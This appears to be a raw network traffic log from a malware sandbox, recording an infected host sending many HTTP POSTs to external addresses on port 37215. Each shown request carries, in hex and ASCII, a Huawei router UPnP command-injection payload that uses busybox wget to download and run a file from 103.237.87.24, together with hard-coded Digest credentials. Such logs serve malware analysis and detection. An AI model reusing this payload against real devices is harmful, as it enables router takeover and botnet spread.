2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1601192.168.2.135878093.177.8.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505024910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1602192.168.2.1345076152.49.36.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505136013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1603192.168.2.1339800157.103.187.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505171061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1604192.168.2.1349416197.216.73.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505234003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1605192.168.2.1348582157.201.118.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505400896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1606192.168.2.1353236212.8.206.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505458117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1607192.168.2.1354790197.98.194.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505505085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1608192.168.2.135826041.125.114.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505513906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1609192.168.2.1353246157.173.25.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505569935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1610192.168.2.1337142167.134.253.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505594969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1611192.168.2.134717641.40.79.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505616903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
